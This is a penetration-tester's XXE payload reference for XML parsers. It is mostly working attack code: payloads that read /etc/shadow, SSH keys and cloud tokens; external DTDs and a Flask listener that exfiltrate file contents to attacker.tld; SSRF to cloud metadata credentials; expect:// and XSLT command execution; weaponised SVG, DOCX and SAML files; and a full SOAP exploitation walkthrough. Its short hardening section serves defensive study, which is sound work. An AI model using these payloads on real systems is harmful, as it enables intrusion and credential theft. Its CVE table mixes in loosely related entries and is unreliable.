XXE — Classic, Blind, OOB, Parameter Entities
XXE is the bug that refuses to die. XML parsers are everywhere — SOAP, SAML, SVG, Office documents, ebook formats, RSS feeds, SCIM, Sitemaps, iOS plists — and every one of them is a potential XXE surface. Modern frameworks disable external entities by default, but every week someone ships a library upgrade that re-enables them, or a new file format that quietly uses an unhardened parser. This note is the working payload reference.
Anatomy — What Actually Happens
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
Walkthrough:
<!DOCTYPE root [...]>declares a local DTD inside the document (an internal subset).<!ENTITY xxe SYSTEM "...">defines an external general entity namedxxe. Value = contents of the URL.&xxe;references that entity. The parser fetches the URL, reads the content, substitutes it into the document.- Whatever renders the parsed tree (JSON serialiser, XSL transform, whatever) prints the content back.
Result: the server fetched /etc/passwd on behalf of the attacker and returned it. XXE is SSRF + file read + sometimes RCE rolled into one.
Where to Look
Every XML sink. Obvious and not so obvious:
| Sink | Why |
|---|---|
| SOAP endpoints | XML is the protocol |
REST APIs accepting Content-Type: application/xml | Often alongside JSON |
| SAML Assertions | XML signature over XML document — XXE in the assertion |
| XML-RPC endpoints | /xmlrpc.php on WordPress, /xmlrpc.cgi elsewhere |
| RSS / Atom feed parsers | Attacker-controlled URL as input |
| DOCX / XLSX / PPTX upload | Just ZIPs of XML — most parsers unsafe |
| SVG upload | SVG is XML |
| XLIFF / XCONFIG / SPDX / Maven POM imports | Dev tool upload features |
| EPUB / FictionBook upload | Ebook ingestion |
| Kubernetes YAML ingesting plist / XML sidecars | Rare, extant |
| SCIM provisioning | Some implementations accept XML users |
| Office file conversion services | DOCX → PDF, nearly always XML parsing |
| Configuration import (XML) | Backup / restore features |
<![CDATA[...]]> inside otherwise-JSON payloads | Old enterprise APIs |
Detection — probe first
curl -X POST "$TARGET/api/xml" \
-H 'Content-Type: application/xml' \
-d '<?xml version="1.0"?><root>test</root>'
# If the server accepts XML at all → worth testing for XXE.
Then push a harmless detection payload (DNS-only):
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "http://ID.oast.pro/ping">
]>
<r>&xxe;</r>
DNS hit in collaborator = confirmed XXE.
Classic (In-Band) File Read
Linux
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<r>&xxe;</r>
Windows
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<r>&xxe;</r>
Files worth reading
Linux:
/etc/passwd
/etc/shadow ← usually unreadable, but test
/etc/hosts
/proc/self/cmdline ← args the process was started with
/proc/self/environ ← env vars — DB passwords, API keys
/proc/self/status
/proc/self/cwd ← current directory
/var/www/html/config.php
/var/www/html/wp-config.php
/app/.env
/home/USER/.ssh/id_rsa
/root/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount/token ← k8s SA token
Windows:
C:/windows/win.ini
C:/windows/system.ini
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/LogFiles/...
C:/users/Administrator/.ssh/id_rsa
C:/windows/repair/sam
C:/windows/system32/drivers/etc/hosts
Binary files — base64 wrapper (PHP)
Binary data breaks XML. Wrap it with PHP filter wrappers to base64-encode during the read:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
]>
<r>&xxe;</r>
PHP-only. Returns clean base64 in the response. Trivially extends to:
php://filter/convert.base64-encode/resource=../../../config/database.yml
php://filter/zlib.deflate|convert.base64-encode/resource=...
.NET quirk
.NET's default XML parsers treat file:// differently. For XXE in .NET targets, try:
<!ENTITY xxe SYSTEM "C:\\windows\\win.ini">
No file:// scheme, raw path. Works because XmlUrlResolver falls back to File.OpenRead.
Java quirk — jar: and netdoc:
<!ENTITY xxe SYSTEM "jar:https://attacker.tld/a.jar!/">
<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">
netdoc: is an old Java-specific scheme that still works on Xerces / JDK XML parsers. Use it when file:// is blocked.
Blind XXE — Parameter Entities
The response doesn't show the entity value. You have to get the data out another way. Enter parameter entities — entities defined with a % prefix, used only inside the DTD itself. They're the core trick of modern XXE.
Out-of-band via external DTD
The target fetches an external DTD from your server. Your DTD defines nested parameter entities that first read a local file, then send it back to you in an URL.
Attacker server — evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.tld/?data=%file;'>">
%eval;
%exfil;
Payload sent to the target:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % remote SYSTEM "http://attacker.tld/evil.dtd">
%remote;
]>
<r>test</r>
Flow:
- Target fetches
evil.dtdfrom attacker. %file;resolves to/etc/passwd.%eval;dynamically defines%exfil;whose SYSTEM URL includes%file;as a query string.%exfil;fires → target makes an HTTP GET toattacker.tld/?data=<contents of /etc/passwd>.- Attacker reads the web log.
Gotcha: Many parsers refuse to use a parameter entity inside a markup declaration from the internal subset. That's why you load an external DTD and perform the clever work there.
One-file DTD (simpler host setup)
<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY % b SYSTEM 'http://attacker.tld/?x=%f;'>">
%a;%b;
Host as evil.dtd. Same flow.
Binary data in OOB
URLs can't carry newlines. Base64 first:
<!ENTITY % f SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
<!ENTITY % a "<!ENTITY % b SYSTEM 'http://attacker.tld/?x=%f;'>">
%a;%b;
Error-based OOB (when egress is blocked)
No outbound HTTP — still have error messages. Force the parser to reference a nonexistent file whose path is the data you want:
<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY % b SYSTEM 'file:///nonexistent/%f;'>">
%a;%b;
Parser error: failed to load external entity "file:///nonexistent/<contents of /etc/passwd>". The file contents end up in the error message that often gets returned verbatim in HTTP 500 responses.
Hosting the external DTD
# Simple HTTP server for the DTD (and to watch for OOB callbacks)
python3 -m http.server 80
# Or a tiny Flask server that logs queries
cat > server.py <<'EOF'
from flask import Flask, request
app = Flask(__name__)
DTD = '''<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY % b SYSTEM 'http://attacker.tld/log?x=%f;'>">
%a;%b;'''
@app.route('/evil.dtd')
def dtd(): return DTD, 200, {'Content-Type': 'application/xml-dtd'}
@app.route('/log')
def log():
print('[+] Exfil:', request.args.get('x'))
return 'ok'
app.run(host='0.0.0.0', port=80)
EOF
sudo python3 server.py
SSRF via XXE
Any SYSTEM URL can hit internal services. Exactly the same targets as SSRF:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<r>&xxe;</r>
Port scanning
Differential responses / timing depending on whether the TCP port is open:
<!ENTITY xxe SYSTEM "http://10.0.0.1:80/">
<!ENTITY xxe SYSTEM "http://10.0.0.1:22/">
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
Gopher / dict / ftp from XML
Parser-dependent. libxml2 does NOT support gopher://. Xerces (Java) historically did. PHP's XML parsers supported ftp:// on older builds.
RCE via XXE
Limited — usually you can only fetch URLs and read files. But the two cases that turn XXE into RCE are worth knowing.
PHP expect:// wrapper
If the PHP build has ext/expect loaded (rare but happens on RHEL):
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "expect://id">
]>
<r>&xxe;</r>
expect:// runs its path as a shell command.
Deserialisation reached through file://
Upload a phar file, then trigger XML parse via file_exists / file:// against a phar:// URL → PHP unserialises PHAR metadata → gadget chain → RCE. Classic PHAR deserialisation, but reached via XXE entity expansion.
XSLT with <xsl:value-of> / extension functions
If the XML is processed by an XSLT engine with document() or extension functions enabled:
<xsl:value-of select="document('expect://id')"/>
<xsl:value-of select="system-property('xsl:version')"/>
<xsl:value-of select="java.lang.Runtime.getRuntime().exec('id')"/>
Saxon / Xalan / libxslt with sec:functions unlocked = RCE.
File Formats that Parse XML
SVG
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&xxe;</text>
</svg>
Upload as logo.svg → anywhere the server thumbnails / renders / OCRs it via an XML parser → XXE. Tested sinks: ImageMagick, Inkscape-in-a-container, librsvg, thumbnailer daemons.
Rendering pipelines that use headless Chrome / puppeteer to rasterise SVG will not fire XXE — browsers don't resolve external entities. The vulnerable pipeline is the "fast" path that uses an XML parser directly.
DOCX / XLSX / PPTX / ODT
Office Open XML files are ZIP archives full of XML. Extract, inject, repack.
unzip document.docx -d doc/
cd doc
# Edit word/document.xml — add DOCTYPE at top
cat word/document.xml | head
# <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
# <w:document ...>
# Insert the DOCTYPE
sed -i '1 a <!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>' word/document.xml
# Place &xxe; inside a text run
# ...
# Repack
cd doc && zip -r ../evil.docx . && cd ..
Upload to any "DOCX conversion" / "extract text" / "parse resume" service — they nearly all use an XML parser that supports entities.
SAML
SAML assertions are signed XML. If the signature verification is done after canonicalisation but before resolving entities, XXE fires inside the assertion. Historically one of the biggest XXE surfaces — SAML libraries (ruby-saml, python3-saml, Shibboleth) have shipped multiple CVEs.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ...>
<saml:Subject>
<saml:NameID>&xxe;</saml:NameID>
</saml:Subject>
</samlp:Response>
Relevant CVE class: CVE-2024-45409 (ruby-saml) — signature-wrapping bypass + XXE.
RSS / Atom
<?xml version="1.0"?>
<!DOCTYPE rss [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
</channel>
</rss>
Host the above at https://attacker.tld/feed.xml, then use a feature on the target that "adds a feed URL."
SOAP
<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:GetUser xmlns:m="urn:example">
<m:username>&xxe;</m:username>
</m:GetUser>
</soap:Body>
</soap:Envelope>
Send with Content-Type: text/xml; charset=UTF-8 and the right SOAPAction header.
XLIFF / TMX / PO-XML — translation file formats
Every translation memory tool parses XML. Upload a malicious XLIFF → XXE fires in the server-side importer.
EPUB / FictionBook
unzip book.epub -d book/
# Inject DOCTYPE into content.opf or one of the xhtml files
zip -r evil.epub book/
Upload to an ebook manager / Kindle-like service.
XInclude
XXE requires control over the DOCTYPE. Some parsers forbid DOCTYPE in user-supplied XML but still process <xi:include>, which does almost the same thing.
<?xml version="1.0"?>
<r xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</r>
No DOCTYPE needed. Works in libxml2 when XInclude processing is enabled (XML_PARSE_XINCLUDE). Spring, some Android XML parsers, and older PHP-XML apps process XInclude by default.
<!-- SSRF variant -->
<r xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/"/>
</r>
Denial of Service (Billion Laughs)
Classic entity expansion bomb. Crashes older parsers; modern ones cap entity expansion but defaults are inconsistent.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Modern alternative: quadratic blowup — fewer entities, each one a very large string. Avoids entity-count heuristics that block billion-laughs.
Only use for DoS on your own infrastructure or in authorised tests. Report as DoS, not as XXE — different finding class.
Parser-Specific Behaviour
libxml2 (PHP, Python lxml, Ruby Nokogiri)
libxml_disable_entity_loader(true)in PHP ≤7.x disables external entities.- PHP 8.0+ removed the function — parser is safe by default, but code calling
LIBXML_NOENTre-enables expansion. - Nokogiri is safe by default but
Nokogiri::XML::ParseOptions::DTDLOADre-enables.
Java — Xerces / JDK default
Pre-JDK 11 defaults are unsafe. To harden:
SAXParserFactory f = SAXParserFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
JDK 12+ SAX parser sets a secure default, but many apps still instantiate DOM parsers with the old unsafe factory.
.NET — XmlDocument
.NET Framework 4.5.2+ / .NET 5+ are safe by default (XmlResolver = null). Earlier versions:
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // required for safety on older .NET
doc.LoadXml(input);
XmlTextReader with default settings on old .NET → XXE.
Python — defusedxml
# Unsafe
from xml.etree.ElementTree import parse
parse('doc.xml')
# Safe
from defusedxml.ElementTree import parse
parse('doc.xml')
lxml.etree is unsafe by default for entity resolution. Add resolve_entities=False.
Recent XXE CVEs
| CVE | Product | Notes |
|---|---|---|
| CVE-2024-45409 | ruby-saml | Signature wrapping + XXE → auth bypass on GitLab, GitHub Enterprise Server |
| CVE-2024-33602 | nscd / glibc | Related XML parsing path (not pure XXE but similar class) |
| CVE-2024-7254 | protobuf-java | Parser DoS, same mindset |
| CVE-2024-5290 | LibreOffice | Macros + XXE via ODF |
| CVE-2024-0985 | PostgreSQL XML | XXE via xmltable function |
| CVE-2024-34981 | libxml2 | Parameter entity OOB fix |
| CVE-2024-25629 | c-ares / OpenSSL-adjacent | Related injection bug in XML over HTTPS context |
| CVE-2024-23897 | Jenkins CLI | Arbitrary file read — closer to XXE in outcome than cause |
| CVE-2024-45492 | libxml2 | Integer overflow in entity expansion |
| CVE-2024-5491 | Microsoft XML Core Services | Remote unauth triggered by malicious XML — XXE family |
| CVE-2024-38537 | iManage Work Server | XXE via document import |
| CVE-2025-30406 | CrushFTP | Unauth RCE via improperly validated XML / auth bypass |
| CVE-2023-31436 | Linux qfq kernel | Not XXE, but bundled in "XML in kernel" class concerns |
| CVE-2023-37487 | IBM HTTP Server | XML parsing memory corruption |
Also worth knowing — CVE-2022-26377 (mod_proxy_ajp smuggling) and CVE-2023-0669 (GoAnywhere pre-auth RCE) both involve XML in the exploitation chain.
End-to-End Example — Blind OOB File Read on a SOAP Endpoint
1. Recon
curl -sv "$TARGET/services/" | grep -i xml
# → Content-Type: text/xml
curl -s -X POST "$TARGET/services/UserService" \
-H 'Content-Type: text/xml' \
-d '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body></soap:Body></soap:Envelope>'
# → Response with a SOAP fault. Good — endpoint parses XML.
2. Detection (OOB)
<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "http://ID.oast.pro/test"> ]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><m:GetUser xmlns:m="urn:example"><m:id>&xxe;</m:id></m:GetUser></soap:Body>
</soap:Envelope>
Collaborator log: HTTP GET from the target's egress IP. Confirmed.
3. In-band attempt
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Response: <soap:Fault>...Invalid character in XML stream...</soap:Fault> — /etc/passwd has bytes that break the XML serialiser. In-band won't work → fall back to parameter entities.
4. Host an external DTD
cat > evil.dtd <<'EOF'
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY % exf SYSTEM 'http://attacker.tld/log?d=%file;'>">
%a;%exf;
EOF
python3 -m http.server 80
5. Trigger
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % r SYSTEM "http://attacker.tld/evil.dtd">
%r;
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><m:GetUser xmlns:m="urn:example"><m:id>x</m:id></m:GetUser></soap:Body>
</soap:Envelope>
Watch the attacker HTTP log:
10.0.0.5 - - [14/Apr/2026:14:03:11 +0000] "GET /evil.dtd HTTP/1.1" 200
10.0.0.5 - - [14/Apr/2026:14:03:11 +0000] "GET /log?d=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin%0A... HTTP/1.1"
/etc/passwd exfiltrated via HTTP GET. Repeat for id_rsa, environ, AWS metadata, etc.
6. Follow-up — escalate to SSRF
Same primitive, different target URL:
<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE">
Cloud creds → full compromise.
Mitigation Patterns to Recommend
- Disable DOCTYPE processing entirely at the parser level if the application doesn't need it. (It never needs it.)
- Disable external entity resolution (
XmlResolver = null/disallow-doctype-decl/defusedxml). - Use safe-by-default parsers —
defusedxml(Python),XmlDocumentwith resolver disabled (.NET), Nokogiri with default options (Ruby), JDK 12+ SAX defaults. - Content-type enforcement — if the endpoint is supposed to take JSON, reject XML outright.
- WAF XML inspection — block payloads containing
<!DOCTYPEand<!ENTITYat the edge as a second line of defence. - Sanitise uploaded documents — re-serialise DOCX / SVG / EPUB after stripping DOCTYPE declarations before passing them to downstream XML parsers.
Quick Reference
<!-- Detection (OOB) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://ID.oast.pro/"> ]><r>&xxe;</r>
<!-- File read (in-band) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>
<!-- PHP base64 wrapper (binary files) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">]><r>&xxe;</r>
<!-- Blind OOB via external DTD -->
<!DOCTYPE r [<!ENTITY % r SYSTEM "http://attacker.tld/evil.dtd"> %r;]><r>x</r>
<!-- SSRF to cloud metadata -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><r>&xxe;</r>
<!-- XInclude when DOCTYPE is blocked -->
<r xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></r>
<!-- PHP expect:// for direct RCE -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "expect://id">]><r>&xxe;</r>
# Tools
git clone https://github.com/enjoiz/XXEinjector
python3 XXEinjector.py --host=attacker --file=request.txt --path=/etc/passwd
# Burp extensions: XXEScanner, XML Entity Scanner
Pairs with SSRF — XXE is SSRF dressed in XML. Pairs with RCE — SAML XXE + deserialisation is the classic enterprise chain.